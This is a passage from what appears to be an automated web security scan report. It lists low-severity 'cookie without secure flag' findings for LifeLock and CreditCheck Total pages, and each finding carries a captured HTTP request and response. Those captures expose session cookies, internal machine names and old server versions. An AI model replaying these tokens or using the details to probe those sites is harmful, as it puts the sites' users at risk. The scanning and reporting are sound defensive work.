The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

11.84. https://secure.lifelock.com/styles/webstore.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

11.85. https://www.creditchecktotal.com/ForgotLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /ForgotLogin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgotLogin.aspx HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login; LastVisitDate=4/24/2011 1:46:04 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:46:17 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:46:17 GMT
ETag: "pv7ce9ac434057bbb8f4f61539afcd878b"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UF02CECB7].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 17721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

11.86. https://www.creditchecktotal.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Login.aspx?SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1; LastVisitDate=4/24/2011 1:45:57 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:46:05 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:46:05 GMT
ETag: "pvc1528d225343c67ac538d6eedf08f763"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U175B4979].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

11.87. https://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1+s_code.axd; LastVisitDate=4/24/2011 5:39:44 PM; mbox=session#1303691685768-21127#1303693858|PC#1303691685768-21127.17#1304901598|check#true#1303692058; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20s_lv%3D1303691998116%7C1398299998116%3B%20s_lv_s%3DFirst%2520Visit%7C1303693798116%3B%20sc_dl%3D1%7C1303693798353%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditchecktotal.com%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DX2THZ%2526SiteVersionID%253D752%2526SiteID%253D100244%2526sc%253D669023%2526bcd%253DEYypxrx2%7C1303693798375%3B%20gpv_PN%3D100244%253Aorder1.aspx%7C1303693798416%3B; s_sess=%20ttc%3D1303691986229%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:36:24 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:24 GMT
ETag: "pv0d6f85543721bcb1e56684a924a43550"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UD1BD9B5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 11103

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

11.88. https://www.creditchecktotal.com/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2 HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=669023&bcd=EYypxrx2&mkwid=sEYypxrx2&pcrid=7154421312&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd; LastVisitDate=4/24/2011 5:34:32 PM; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:29:14 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:29:15 GMT
ETag: "pv34a726d0b6fba38b350738c48c05f169"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UA22DB830].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 26962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

11.89. https://www.creditchecktotal.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:39:40 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:39:44 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:39:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:39:44 GMT
ETag: "pv404e091486891421ee6e2e3bd0924e54"
Expires: Wed, 27 Apr 2011 00:39:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C64259.A70594.RA70541.G11457.U330279B1].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 863

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

11.90. https://www.creditchecktotal.com/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/s_code.axd HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
